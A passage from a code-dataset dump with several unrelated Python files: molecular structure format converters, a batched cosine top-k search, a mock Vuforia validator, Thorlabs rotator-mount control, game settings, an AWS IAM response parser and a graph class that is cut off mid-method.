names\n elements = df['element'].unique()\n el_count = {}\n for e in elements:\n el_count[e] = 0\n new_name = []\n for el in df['element']:\n el_count[el] += 1\n new_name.append('%s%i'%(el,el_count[el]))\n # Fill additional fields\n df['ensemble'] = [df.name.replace(' ','_')]*len(df)\n df['subunit'] = [0]*len(df)\n df['structure'] = [df.name.replace(' ','_')]*len(df)\n df['model'] = [0]*len(df)\n df['chain'] = ['L']*len(df)\n df['hetero'] = ['']*len(df)\n df['insertion_code'] = ['']*len(df)\n df['residue'] = [1]*len(df)\n df['segid'] = ['LIG']*len(df)\n df['resname'] = ['LIG']*len(df)\n df['altloc'] = ['']*len(df)\n df['occupancy'] = [1.]*len(df)\n df['bfactor'] = [0.]*len(df)\n df['name'] = new_name\n df['fullname'] = new_name\n df['serial_number'] = range(len(df))\n # Convert to biopython representation\n bp = df_to_bp(df)\n if gdb:\n return bp, data, freq, smiles, inchi\n else:\n return bp\n\n\ndef bp_to_df(bp):\n \"\"\"Convert biopython representation to pandas dataframe representation.\"\"\"\n df = col.defaultdict(list)\n for atom in Bio.PDB.Selection.unfold_entities(bp, 'A'):\n residue = atom.get_parent()\n chain = residue.get_parent()\n model = chain.get_parent()\n df['ensemble'].append(bp.get_id())\n df['subunit'].append(0)\n df['structure'].append(bp.get_id())\n df['model'].append(model.serial_num)\n df['chain'].append(chain.id)\n df['hetero'].append(residue.id[0])\n df['insertion_code'].append(residue.id[2])\n df['residue'].append(residue.id[1])\n df['segid'].append(residue.segid)\n df['resname'].append(residue.resname)\n df['altloc'].append(atom.altloc)\n df['occupancy'].append(atom.occupancy)\n df['bfactor'].append(atom.bfactor)\n df['x'].append(atom.coord[0])\n df['y'].append(atom.coord[1])\n df['z'].append(atom.coord[2])\n df['element'].append(atom.element)\n df['name'].append(atom.name)\n df['fullname'].append(atom.fullname)\n df['serial_number'].append(atom.serial_number)\n df = pd.DataFrame(df)\n return df\n\n\ndef df_to_bp(df_in):\n \"\"\"Convert dataframe representaion to biopython representation.\"\"\"\n all_structures = df_to_bps(df_in)\n if len(all_structures) > 1:\n raise RuntimeError('More than one structure in provided dataframe.')\n return all_structures[0]\n\n\ndef df_to_bps(df_in):\n \"\"\"Convert dataframe representation to biopython representations.\"\"\"\n df = df_in.copy()\n all_structures = []\n for (structure, s_atoms) in split_df(df_in, ['ensemble', 'structure']):\n new_structure = Bio.PDB.Structure.Structure(structure[1])\n for (model, m_atoms) in df.groupby(['model']):\n new_model = Bio.PDB.Model.Model(model)\n for (chain, c_atoms) in m_atoms.groupby(['chain']):\n new_chain = Bio.PDB.Chain.Chain(chain)\n for (residue, r_atoms) in c_atoms.groupby(\n ['hetero', 'residue', 'insertion_code']):\n # Take first atom as representative for residue values.\n rep = r_atoms.iloc[0]\n new_residue = Bio.PDB.Residue.Residue(\n (rep['hetero'], rep['residue'], rep['insertion_code']),\n rep['resname'], rep['segid'])\n for row, atom in r_atoms.iterrows():\n new_atom = Bio.PDB.Atom.Atom(\n atom['name'],\n [atom['x'], atom['y'], atom['z']],\n atom['bfactor'],\n atom['occupancy'],\n atom['altloc'],\n atom['fullname'],\n atom['serial_number'],\n atom['element'])\n new_residue.add(new_atom)\n new_chain.add(new_residue)\n new_model.add(new_chain)\n new_structure.add(new_model)\n all_structures.append(new_structure)\n return all_structures\n\n\ndef split_df(df, key):\n return [(x, y) for x, y in df.groupby(key)]\n\n\ndef merge_dfs(dfs):\n return pd.concat(dfs).reset_index(drop=True)\n\n\ndef bp_from_xyz_dict(data, struct_name='structure'):\n \"\"\"Construct a biopython structure from xyz data (stored in a dict).\"\"\"\n # Read info from dictionary\n elements = data['elements']\n charges = data['charges']\n coordinates = data['coordinates']\n # Create a residue\n # (each small molecule is counted as just one residue)\n r = Bio.PDB.Residue.Residue((' ', 1, ' '), 'res', 0)\n # Iterate through all atoms and collect info\n for i in range(len(charges)):\n atom_name = elements[i] + str(i)\n position = coordinates[i]\n full_name = elements[i] + str(i)\n b_factor = 0.0\n occupancy = 1.0\n alt_loc = ' '\n serial_n = i\n element = elements[i]\n # Create an atom with the provided information\n a = Bio.PDB.Atom.Atom(atom_name,\n position,\n b_factor,\n occupancy,\n alt_loc,\n full_name,\n serial_n,\n element=element)\n # Add the atom to the residue\n r.add(a)\n # Create one chain and add the residue\n c = Bio.PDB.Chain.Chain('A')\n c.add(r)\n # Create one model and add the chain\n m = Bio.PDB.Model.Model(0)\n m.add(c)\n # Create one structure and add the model\n s = Bio.PDB.Structure.Structure(struct_name)\n s.add(m)\n return s\n\n\ndef read_sdf_to_mol(sdf_file, sanitize=False, add_h=False, remove_h=False):\n \"\"\"Reads a list of molecules from an SDF file.\n\n Args:\n add_h (bool): Adds hydrogens. Default: False\n remove_h (bool): Removes hydrogen. Default: False\n sanitize (bool): Tries to sanitize the molecule. Default: False\n\n \"\"\"\n\n suppl = Chem.SDMolSupplier(sdf_file, sanitize=sanitize, removeHs=remove_h)\n\n molecules = [mol for mol in suppl]\n\n if add_h:\n for mol in molecules:\n if mol is not None:\n mol = Chem.AddHs(mol, addCoords=True)\n\n return molecules\n\n\ndef get_coordinates_of_conformer(mol):\n \"\"\"Reads the coordinates of the conformer\n\n Args:\n mol (Mol): Molecule in RDKit format.\n\n Returns:\n xyz (float array): Coordinates\n\n \"\"\"\n\n symb = [a.GetSymbol() for a in mol.GetAtoms()]\n conf = mol.GetConformer()\n xyz = np.empty([mol.GetNumAtoms(), 3])\n\n for ia, name in enumerate(symb):\n position = conf.GetAtomPosition(ia)\n xyz[ia] = np.array([position.x, position.y, position.z])\n\n return xyz\n\n\ndef get_connectivity_matrix_from_mol(mol):\n \"\"\"Generates the connection matrix from a molecule.\n\n Args:\n mol (Mol): a molecule in RDKit format\n\n Returns:\n connect_matrix (2D numpy array): connectivity matrix\n\n \"\"\"\n\n # Initialization\n num_at = mol.GetNumAtoms()\n connect_matrix = np.zeros([num_at, num_at], dtype=int)\n\n # Go through all atom pairs and check for bonds between them\n for a in mol.GetAtoms():\n for b in mol.GetAtoms():\n bond = mol.GetBondBetweenAtoms(a.GetIdx(), b.GetIdx())\n if bond is not None:\n connect_matrix[a.GetIdx(), b.GetIdx()] = 1\n\n return connect_matrix\n\n\ndef get_bonds_matrix_from_mol(mol):\n \"\"\"\n Provides bond matrix from a molecule.\n Bond types are encoded as double:\n single bond (1.0)\n double bond (2.0)\n triple bond (3.0)\n aromatic bond (1.5).\n\n Args:\n mol (Mol): a molecule in RDKit format\n\n Returns:\n connect_matrix (2D numpy array): connectivity matrix\n\n \"\"\"\n\n # Initialization\n num_at = mol.GetNumAtoms()\n bonds_matrix = np.zeros([num_at, num_at])\n\n # Go through all atom pairs and check for bonds between them\n for a in mol.GetAtoms():\n for b in mol.GetAtoms():\n bond = mol.GetBondBetweenAtoms(a.GetIdx(), b.GetIdx())\n if bond is not None:\n bt = bond.GetBondTypeAsDouble()\n bonds_matrix[a.GetIdx(), b.GetIdx()] = bt\n\n return bonds_matrix\n\n\ndef get_bonds_list_from_mol(mol):\n \"\"\"\n Extract bonds from a molecule.\n Bond types are encoded as double:\n single bond (1.0)\n double bond (2.0)\n triple bond (3.0)\n aromatic bond (1.5).\n\n Args:\n mol (Mol): a molecule in RDKit format\n\n Returns:\n bonds_df (pandas dataframe): list of bonds\n\n \"\"\"\n bonds_list = []\n for b in mol.GetBonds():\n atom1 = b.GetBeginAtomIdx()\n atom2 = b.GetEndAtomIdx()\n btype = b.GetBondTypeAsDouble()\n bonds_list.append([atom1,atom2,btype])\n col = ['atom1','atom2','type']\n bonds_df = pd.DataFrame(bonds_list, columns=col)\n return bonds_df\n\n\ndef mol_to_df(mol, add_hs=False, structure=None, model=None, ensemble=None, residue=999):\n \"\"\"\n Convert Mol object to dataframe format (with PDB columns)\n \"\"\"\n from rdkit import Chem\n df = col.defaultdict(list)\n if add_hs:\n mol = Chem.AddHs(mol, addCoords=True)\n conf = mol.GetConformer()\n for i, a in enumerate(mol.GetAtoms()):\n position = conf.GetAtomPosition(i)\n df['ensemble'].append(ensemble)\n df['structure'].append(structure)\n df['model'].append(model)\n df['chain'].append('LIG')\n df['hetero'].append('')\n df['insertion_code'].append('')\n df['residue'].append(residue)\n df['segid'].append('')\n df['resname'].append('LIG')\n df['altloc'].append('')\n df['occupancy'].append(1)\n df['bfactor'].append(0)\n df['x'].append(position.x)\n df['y'].append(position.y)\n df['z'].append(position.z)\n df['element'].append(a.GetSymbol())\n df['serial_number'].append(i)\n df = pd.DataFrame(df)\n # Make up atom names\n elements = df['element'].unique()\n el_count = {}\n for e in elements:\n el_count[e] = 0\n new_name = []\n for el in df['element']:\n el_count[el] += 1\n new_name.append('%s%i'%(el,el_count[el]))\n df['name'] = new_name\n df['fullname'] = new_name\n return df\n\n\ndef get_coordinates_from_df(df):\n xyz = np.empty([len(df), 3])\n\n xyz[:, 0] = np.array(df.x)\n xyz[:, 1] = np.array(df.y)\n xyz[:, 2] = np.array(df.z)\n\n return xyz\n\n","sub_path":"atom3d/util/formats.py","file_name":"formats.py","file_ext":"py","file_size_in_byte":16586,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"371618688","text":"import numpy as np\nimport timeit\nimport heapq\nimport gc\n\ndef CosinePairwise_V0(selfie, ID, k, batch_size):\n\tnotStart = True\n\ttopkCosIdx = []\n\tnSelfie = selfie.shape[0]\n\tnID = ID.shape[0]\n\tbaseNpArrange = np.arange(batch_size*nID)\n\tlogFile = open(\"logs/LogV0_{}_{}_{}.txt\".format(nSelfie, nID, batch_size),\"w\")\n\n\tfor row_i in range(0, int(nSelfie / batch_size) + 1):\n\t start = row_i * batch_size\n\t end = min([(row_i + 1) * batch_size, nSelfie])\n\t if end <= start:\n\t break\n\t startMatmul = timeit.default_timer()\n\t evalBatchCosPw =-np.matmul(selfie[start:end], ID.T).reshape((-1,))\n\t stopMatmul = timeit.default_timer()\n\t \n\t startNpArrange = timeit.default_timer()\n\t batchIndex = baseNpArrange + (start * nID)\n\t stopNpArrange = timeit.default_timer()\n\t \n\t startHeap = timeit.default_timer()\n\t if (notStart):\n\t curLentopkCosIdx = len(topkCosIdx)\n\t if ((curLentopkCosIdx + (batch_size*nID)) > k):\n\t print(\"Conat {} and remain heap {}\".format(k-curLentopkCosIdx, batch_size*nID - k + curLentopkCosIdx))\n\t topkCosIdx = topkCosIdx + list(zip(evalBatchCosPw[:(k-curLentopkCosIdx)], batchIndex[:(k-curLentopkCosIdx)]))\n\t print(\"Init heap\") \n\t topkCosIdx = list(topkCosIdx)\n\t gc.collect()\n\t heapq.heapify(topkCosIdx)\n\t notStart = False\n\t curIndex = k-curLentopkCosIdx\n\t print(\"Start for heap\")\n\t for aCos in evalBatchCosPw[(k-curLentopkCosIdx):]:\n\t if (topkCosIdx[0][0] < aCos):\n\t heapq.heappushpop(topkCosIdx, (aCos, batchIndex[curIndex]))\n\t curIndex += 1\n\t else:\n\t print(\"Concat All\")\n\t topkCosIdx = topkCosIdx + list(zip(evalBatchCosPw, batchIndex))\n\t else:\n\t print(\"Heap all\")\n\t curIndex = 0\n\t for aCos in evalBatchCosPw:\n\t if (topkCosIdx[0][0] < aCos):\n\t heapq.heappushpop(topkCosIdx, (aCos, batchIndex[curIndex]))\n\t curIndex += 1\n\t stopHeap = timeit.default_timer()\n\t evalBatchCosPw = []\n\t batchIndex = []\n\t gc.collect()\n\t \n\t outStr = \"Process row: ({}:{}). Matmul time: {}s. Np Arange time: {}s. Heap time: {}s\".format(start, end, stopMatmul - startMatmul, stopNpArrange - startNpArrange, stopHeap - startHeap)\n\t print(outStr)\n\t logFile.write(\"%s\\n\" %(outStr))\n\n\tlogFile.close()\n\treturn topkCosIdx\n\ndef idx2RC(topkCosIdx, nID):\n\tk = len(topkCosIdx)\n\ttopkCosRCIndex = np.zeros((k,3))\n\tfor i in range(k):\n\t (curCos, curIndex) = heapq.heappop(topkCosIdx)\n\t topkCosRCIndex[k-i-1] = [-curCos, curIndex // nID, curIndex % nID]\n\treturn topkCosRCIndex\n","sub_path":"ulti.py","file_name":"ulti.py","file_ext":"py","file_size_in_byte":2681,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"366395871","text":"\"\"\"\nValidators for the project state.\n\"\"\"\n\nfrom typing import Dict, Set\n\nfrom mock_vws._database_matchers import get_database_matching_client_keys\nfrom mock_vws._query_validators.exceptions import InactiveProject\nfrom mock_vws.database import VuforiaDatabase\nfrom mock_vws.states import States\n\n\ndef validate_project_state(\n request_path: str,\n request_headers: Dict[str, str],\n request_body: bytes,\n request_method: str,\n databases: Set[VuforiaDatabase],\n) -> None:\n \"\"\"\n Validate the state of the project.\n\n Args:\n request_path: The path of the request.\n request_headers: The headers sent with the request.\n request_body: The body of the request.\n request_method: The HTTP method of the request.\n databases: All Vuforia databases.\n\n Raises:\n InactiveProject: The project is inactive.\n \"\"\"\n database = get_database_matching_client_keys(\n request_headers=request_headers,\n request_body=request_body,\n request_method=request_method,\n request_path=request_path,\n databases=databases,\n )\n\n assert isinstance(database, VuforiaDatabase)\n if database.state != States.PROJECT_INACTIVE:\n return\n\n raise InactiveProject\n","sub_path":"src/mock_vws/_query_validators/project_state_validators.py","file_name":"project_state_validators.py","file_ext":"py","file_size_in_byte":1240,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"360836320","text":"import clr # installs DOTNET DLLs\nimport contextlib\nimport sys\nimport time\n\nfrom optics.hardware_control.hardware_addresses_and_constants import polarizer_offset, waveplate_offset\n\nsys.path.append(\"C:\\\\Program Files (x86)\\\\Thorlabs\\\\Kinesis\") # adds DLL path to PATH\n\n# DOTNET (x64) DLLs. These need to be UNBLOCKED to be found (right click -> properties -> unblock\n# This uses Python For DotNet NOT IronPython\n\nclr.AddReference(\"Thorlabs.MotionControl.TCube.DCServoCLI\") # TDC001 DLL\nclr.AddReference(\"Thorlabs.MotionControl.KCube.DCServoCLI\") # KDC101 DLL\nclr.AddReference(\"Thorlabs.MotionControl.DeviceManagerCLI\")\nclr.AddReference(\"Thorlabs.MotionControl.GenericMotorCLI\")\nclr.AddReference(\"Thorlabs.MotionControl.TCube.DCServoUI\")\nclr.AddReference(\"Thorlabs.MotionControl.GenericMotorCLI\")\nclr.AddReference(\"System\")\n\n# Import the namespaces as modules - they are going to look like these are invalid, but they aren't\n\nfrom Thorlabs.MotionControl.DeviceManagerCLI import DeviceManagerCLI\nfrom Thorlabs.MotionControl.TCube.DCServoCLI import TCubeDCServo # TDC001\nfrom Thorlabs.MotionControl.KCube.DCServoCLI import KCubeDCServo # KDC101\nfrom System import Decimal\n\n\n@contextlib.contextmanager\ndef connect_tdc001(serial_number, waveplate=False):\n device = None\n try:\n DeviceManagerCLI.BuildDeviceList()\n # Tell the device manager to get the list of all devices connected to the computer\n serial_numbers = DeviceManagerCLI.GetDeviceList(TCubeDCServo.DevicePrefix)\n # get available TCube DC Servos and check our serial number is correct\n if str(serial_number) not in serial_numbers:\n raise ValueError(\"Device is not connected.\")\n device = TCubeDCServo.CreateTCubeDCServo(str(serial_number))\n device.Connect(str(serial_number))\n device.WaitForSettingsInitialized(5000)\n if not device.IsSettingsInitialized():\n raise ValueError(\"Device initialization timeout\")\n device.LoadMotorConfiguration(str(serial_number))\n device.StartPolling(250)\n device.EnableDevice()\n motorSettings = device.LoadMotorConfiguration(str(serial_number))\n currentDeviceSettings = device.MotorDeviceSettings\n if waveplate:\n yield WaveplateController(device)\n else:\n yield PolarizerController(device)\n finally:\n if device:\n device.Disconnect()\n else:\n print('TDC101 waveplate controller communication error')\n raise ValueError\n\n\n@contextlib.contextmanager\ndef connect_kdc101(serial_number, waveplate=True):\n device = None\n try:\n DeviceManagerCLI.BuildDeviceList() # Tell the device manager to get the list of all devices connected to the computer\n serial_numbers = DeviceManagerCLI.GetDeviceList(KCubeDCServo.DevicePrefix)\n # get available KCube Servos and check our serial number is correct\n if str(serial_number) not in serial_numbers:\n raise ValueError(\"Device is not connected.\")\n device = KCubeDCServo.CreateKCubeDCServo(str(serial_number))\n device.Connect(str(serial_number))\n device.WaitForSettingsInitialized(5000)\n if not device.IsSettingsInitialized():\n raise ValueError(\"Device initialization timeout\")\n device.LoadMotorConfiguration(str(serial_number))\n device.StartPolling(250)\n device.EnableDevice()\n motorSettings = device.LoadMotorConfiguration(str(serial_number)) # This is important to leave in, but I'm not sure\n # why\n currentDeviceSettings = device.MotorDeviceSettings # This is important to leave in, but I'm not sure why\n if waveplate:\n yield WaveplateController(device)\n else:\n yield PolarizerController(device)\n finally:\n if device:\n device.Disconnect()\n else:\n print('KDC101 waveplate controller communication error')\n raise ValueError\n\nclass RotatorMountController:\n def __init__(self, device):\n self._device = device\n\n def read_position(self, wait_ms=0):\n time.sleep(wait_ms/1000)\n position = float(str(self._device.Position))\n return position\n\n def home(self):\n self._device.Home(self._device.InitializeWaitHandler())\n\n def move(self, position):\n while position > 360:\n position -= 360\n self._device.MoveTo(Decimal(position), self._device.InitializeWaitHandler())\n # this is a System.Decimal!\n\n\nclass WaveplateController(RotatorMountController):\n def __init__(self, device):\n self._device = device\n super().__init__(self._device)\n\n def move_nearest(self, position):\n current_position = self.read_position()\n i = 0\n for i in range(180):\n if position % 90 - 0.5 < (current_position + i) % 90 < position % 90 + 0.5:\n break\n self.move(current_position + i)\n\n def read_polarization(self, wait_ms=0):\n return self.read_position(wait_ms) * 2\n\n\nclass PolarizerController(RotatorMountController):\n def __init__(self, device):\n self._device = device\n super().__init__(self._device)\n self._polarizer_offset = polarizer_offset\n\n def move(self, position):\n calibrated_position = self._polarizer_offset * position # There is an offset of around 1.183 times the value\n # due to slipping of the CR1Z6 mount\n # This should be changed once a new motor is purchased\n self._device.MoveTo(Decimal(calibrated_position), self._device.InitializeWaitHandler())\n # this is a System.Decimal!\n\n def move_nearest(self, position):\n calibrated_position = self._polarizer_offset * position\n current_position = float(str(self._device.Position))\n if position in (0, 45):\n if calibrated_position - 1.1 < current_position % (90 * self._polarizer_offset) < calibrated_position + 1.1:\n return None\n for i in range(180):\n if calibrated_position - 1.1 < (current_position + i) % (90 * self._polarizer_offset) \\\n < calibrated_position + 1.1:\n break\n else:\n if calibrated_position - 1.1 < current_position % (180 * self._polarizer_offset) \\\n < calibrated_position + 1.1:\n return None\n for i in range(180):\n if calibrated_position - 1.1 < (current_position + i) % (180 * self._polarizer_offset) \\\n < calibrated_position + 1.1:\n break\n #self._device.MoveRelative(MotorDirection.Forward, Decimal(i), self._device.InitializeWaitHandler())\n new_position = current_position + i\n self._device.MoveTo(Decimal(new_position), self._device.InitializeWaitHandler())\n # this is a System.Decimal!\n\n def read_polarization(self, wait_ms=0):\n return self.read_position(wait_ms) / self._polarizer_offset\n\n","sub_path":"optics/hardware_control/polarizercontroller.py","file_name":"polarizercontroller.py","file_ext":"py","file_size_in_byte":6982,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"546976473","text":"class Settings:\n \"\"\"Klasa przeznaczona do przechowywania wszystkich ustawień gry.\"\"\"\n\n def __init__(self):\n \"\"\"Inicjalizacja ustawień gry.\"\"\"\n # Ustawienia ekranu.\n self.screen_width = 1200\n self.screen_height = 800\n self.bg_color = (130, 110, 250)\n self.fullscreen = 0\n self.sky_speed = 1.9\n\n # Ustawienia dotyczące statku.\n self.ship_limit = 3\n\n # Ustawienia dot. pocisku.\n self.bullet_width = 4\n self.bullet_height = 67\n self.bullet_color = (50, 255, 50)\n self.bullets_allowed = 6\n\n # Ustawienia dotyczące obcego.\n self.alien_fleet_drop_speed = 10\n\n # Łatwa zmiana szybkości gry.\n self.speedup_scale = 1.1\n\n # Łatwa zmiana liczby punktów przyznawanych za zestrzelenie obcego.\n self.score_scale = 1.5\n\n self.initialize_dynamic_settings()\n\n def initialize_dynamic_settings(self):\n \"\"\"Inicjalizacja ustawień, które ulegają zmianie w trakcie gry.\"\"\"\n self.ship_speed = 2.5\n self.bullet_speed = 4.5\n self.alien_speed = 0.5\n\n # Wartość fleet_direction wynosząca 1 oznacza ruch w prawo, natomiast -1 w lewo.\n self.fleet_direction = 1\n\n # Punktacja.\n self.alien_points = 50\n\n def increase_speed(self):\n \"\"\"Zmiana ustawień dotyczących szybkości.\"\"\"\n self.ship_speed *= self.speedup_scale\n self.bullet_speed *= self.speedup_scale\n self.alien_speed *= self.speedup_scale\n\n self.alien_points = int(self.alien_points * self.score_scale)\n print(self.alien_points)","sub_path":"settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":1626,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"334818958","text":"import datetime\nfrom dateutil.parser import parse\nfrom dateutil.tz import tzutc\n\n# Handling AWS Boto responses which have Dict + List + Dict to unwrap a value\n# You have to hand the KeyError risk\n\n# Dict - aws_iam_response\n# List[0] - aws_iam_response['AccessKeyMetadata']\n# List[0] - Dict of data\n\naws_iam_response = {'AccessKeyMetadata': [{\n 'UserName': 'foobar',\n 'AccessKeyId': 'AKIAV2V7NSN7XXXXXXX',\n 'Status': 'Active',\n 'CreateDate': datetime.datetime(2021, 2, 13, 7, 2, 8, tzinfo=tzutc())}],\n 'IsTruncated': False,\n 'ResponseMetadata':\n {'RequestId': 'aaaaaaaa-aaaa-aaaa-aaaa-ffffffffffff',\n 'HTTPStatusCode': 200,\n 'HTTPHeaders':\n {'x-amzn-requestid': 'aaaaaaaa-aaaa-aaaa-aaaa-ffffffffffff',\n 'content-type': 'text/xml',\n 'content-length': '554',\n 'date': 'Wed, 12 May 2021 15:23:30 GMT'},\n 'RetryAttempts': 0}}\n\n\ndef validate_date_return_pretty(date_text):\n cleaned_date = parse(date_text)\n return f'{cleaned_date:%d-%m-%Y\\t%H:%M%p}'\n\n\n# Parse response\nfor key, value in aws_iam_response.items():\n if isinstance(value, list):\n dict_of_active_keyid = value[0]\n access_key_id = dict_of_active_keyid.get('AccessKeyId', None)\n print(access_key_id)\n\n# Direct, without parsing response. High risk of KeyError\nprint(f'[*]AccessKeyId: \\t{aws_iam_response[\"AccessKeyMetadata\"][0][\"AccessKeyId\"]}')\n\n# Focused on removing KeyError risk\naccess_key_id = aws_iam_response.get(\"AccessKeyMetadata\", {})[0].get(\"AccessKeyId\", {})\nif access_key_id:\n print(f'[*]AccessKeyId: \\t{access_key_id}')\n","sub_path":"python/parse_dict.py","file_name":"parse_dict.py","file_ext":"py","file_size_in_byte":1673,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"343480236","text":"# ------------------------------------------------------------\n# Copyright (c) 2017-present, SeetaTech, Co.,Ltd.\n#\n# Licensed under the BSD 2-Clause License.\n# You should have received a copy of the BSD 2-Clause License\n# along with the software. If not, See,\n#\n# \n#\n# ------------------------------------------------------------\n\nfrom __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport threading\nimport dragon.import_c_api as _C\n\nfrom contextlib import contextmanager\n\n\n__all__ = [\n 'name_scope',\n 'phase_scope',\n 'device_scope',\n 'get_default_phase',\n 'get_default_device',\n 'get_default_name_scope',\n 'WorkspaceScope',\n]\n\n\nclass _ThreadLocalStack(threading.local):\n def __init__(self):\n super(_ThreadLocalStack, self).__init__()\n self._enforce_nesting = True\n self.stack = []\n\n def get_default(self):\n return self.stack[-1] if len(self.stack) >= 1 else None\n\n def is_cleared(self):\n return not self.stack\n\n @property\n def enforce_nesting(self):\n return self._enforce_nesting\n\n @enforce_nesting.setter\n def enforce_nesting(self, value):\n self._enforce_nesting = value\n\n @contextmanager\n def get_controller(self, default):\n \"\"\"A context manager for manipulating a default stack.\"\"\"\n self.stack.append(default)\n try:\n yield default\n finally:\n # stack may be empty if reset() was called\n if self.stack:\n if self._enforce_nesting:\n if self.stack[-1] is not default:\n raise AssertionError(\n \"Nesting violated for default stack of %s objects\" %\n type(default))\n self.stack.pop()\n else:\n self.stack.remove(default)\n\n\nclass WorkspaceScope(object):\n \"\"\"WorkspaceScope is a auxiliary to assign the specific workspace.\n\n Examples\n --------\n >>> import dragon as dg\n >>> with WorkspaceScope('session1'): pass\n >>> with dg.ws_scope('session2'): pass\n\n \"\"\"\n def __init__(self, ws_name):\n assert isinstance(ws_name, type('str')), \\\n 'WorkspaceScope takes in a string as its argument.'\n assert ws_name != '', \\\n 'The workspace name should not be empty.'\n self.ws = ws_name\n self.prev = 'default'\n\n def __enter__(self):\n self.prev = _C.CurrentWorkspace()\n _C.SwitchWorkspace(self.ws, True)\n\n def __exit__(self, type, value, traceback):\n _C.SwitchWorkspace(self.prev, True)\n\n\n_GLOBAL_TENSOR_STACK = _ThreadLocalStack()\n_GLOBAL_PHASE_STACK = _ThreadLocalStack()\n_GLOBAL_DEVICE_STACK = _ThreadLocalStack()\n_PREDEFINED_SCOPE_SEPARATOR = '/'\n\n\ndef name_scope(name):\n \"\"\"Nest the specified name for naming tensors.\n\n Parameters\n ----------\n name : str\n The name adding to the tensors.\n\n Returns\n -------\n str\n The current nesting prefix.\n\n Examples\n --------\n >>> import dragon\n >>> with dragon.name_scope('conv1'): a = dragon.Tensor('weights')\n >>> a.name\n >>> \"conv1/weights\"\n\n \"\"\"\n if name != '': prefix = name + _PREDEFINED_SCOPE_SEPARATOR\n else: prefix = '' # Avoid duplicated separators\n default = get_default_name_scope() + prefix\n return _GLOBAL_TENSOR_STACK.get_controller(default)\n\n\ndef device_scope(device_type, device_id=0):\n \"\"\"Nest the the specific device info.\n\n Parameters\n ----------\n device_type : {'cpu', 'gpu', 'cuda', 'cnml'}, required\n The type of device.\n device_id : int, optional\n The index of the device.\n\n \"\"\"\n device_type, device_id, device_type.lower(), device_id\n assert device_type in ['cpu', 'gpu', 'cuda', 'cnml']\n # Default names\n if device_type == 'gpu': device_type = 'cuda'\n return _GLOBAL_DEVICE_STACK.get_controller({\n 'device_type': device_type,\n 'device_id': device_id})\n\n\ndef phase_scope(phase):\n \"\"\"Nest the the specific phase.\n\n Parameters\n ----------\n phase : {'TRAIN', 'TEST'}, required\n The phase.\n\n Returns\n -------\n str\n The specified phase.\n\n Examples\n --------\n >>> import dragon\n >>> a = dragon.ops.RandomUniform([2, 3])\n >>> with dragon.phase_scope(phase='TEST'): f_eval = dragon.function(outputs=a)\n\n \"\"\"\n phase = phase.upper()\n assert phase in ('TRAIN', 'TEST'), \\\n \"Specified an unknown phase: \" + phase\n return _GLOBAL_PHASE_STACK.get_controller(phase)\n\n\ndef get_default_name_scope():\n \"\"\"Return the name scope in current nesting.\n\n Returns\n -------\n str\n The name scope.\n\n \"\"\"\n ret = _GLOBAL_TENSOR_STACK.get_default()\n return ret if ret is not None else ''\n\n\ndef get_default_phase():\n \"\"\"Return the phase in current nesting.\n\n Returns\n -------\n str or None\n The phase.\n\n \"\"\"\n return _GLOBAL_PHASE_STACK.get_default()\n\n\ndef get_default_device():\n \"\"\"Return the device dict in current nesting.\n\n The device dict contains the following keys:\n\n (``device_type``, ``device_id``).\n\n Returns\n -------\n dict\n The device dict.\n\n \"\"\"\n return _GLOBAL_DEVICE_STACK.get_default()","sub_path":"Dragon/python/dragon/core/scope.py","file_name":"scope.py","file_ext":"py","file_size_in_byte":5325,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"414391715","text":"\"\"\"Module with implementation of Graph Traversal.\"\"\"\nfrom queue import Queue\nfrom stack import Stack\n\n\nclass Graph(object):\n \"\"\"Implementation of Graph Traversal.\"\"\"\n\n def __init__(self):\n \"\"\".\"\"\"\n self.node_dict = {}\n\n def nodes(self):\n \"\"\"Return a list of all nodes in the graph.\"\"\"\n return list(self.node_dict.keys())\n\n def edges(self):\n \"\"\"Return a list of all edges in the graph.\"\"\"\n edge_list = []\n for node1 in self.node_dict:\n for node2 in self.node_dict[node1]:\n edge_list.append((node1, node2))\n return edge_list\n\n def add_node(self, n):\n \"\"\"Add a node 'n' to the graph.\"\"\"\n self.node_dict.setdefault(n, [])\n\n def add_edge(self, n1, n2):\n \"\"\"Add an edge to the graph with source, dest of 'n1', 'n2'. Add node if either not present.\"\"\"\n self.add_node(n1)\n self.add_node(n2)\n if n2 in self.node_dict[n1]:\n raise ValueError(\"Edge already exists\")\n self.node_dict[n1].append(n2)\n\n def del_node(self, n):\n \"\"\"Delete the node 'n' from the graph. Raise error if no such node exists.\"\"\"\n if n in self.node_dict:\n del self.node_dict[n]\n for node in self.node_dict:\n try:\n self.del_edge(node, n)\n except:\n pass\n else:\n raise KeyError(\"Cannot remove node that does not exist.\")\n\n def del_edge(self, n1, n2):\n \"\"\"Delete edge from 'n1' to 'n2'. Raise error if no such edge exists.\"\"\"\n if n1 in self.node_dict and n2 in self.node_dict[n1]:\n self.node_dict[n1].remove(n2)\n else:\n raise KeyError(\"Cannot remove edge that does not exist.\")\n\n def has_node(self, n):\n \"\"\"True or False based on if node 'n' is present in the graph.\"\"\"\n return n in self.node_dict\n\n def neighbors(self, n):\n \"\"\"Return the list of all nodes connected to 'n' by edges. Raise error if n is not present.\"\"\"\n if n not in self.node_dict:\n raise KeyError(\"Cannot return neighbors of node that does not exist.\")\n return self.node_dict[n]\n\n def adjacent(self, n1, n2):\n \"\"\"Return True/False for if an edge connects 'n1' and 'n2'. Raises error if either nodes not present.\"\"\"\n if n1 in self.node_dict and n2 in self.node_dict:\n return n2 in self.node_dict[n1]\n raise KeyError(\"Nodes not in graph!\")\n\n def depth_first_traversal(self, start, track=None):\n \"\"\"Graph traversal depth first.\"\"\"\n res = [start]\n if track is None:\n track = set()\n track.add(start)\n try:\n for n in self.node_dict[start]:\n if n not in track:\n res += self.depth_first_traversal(n, track)\n 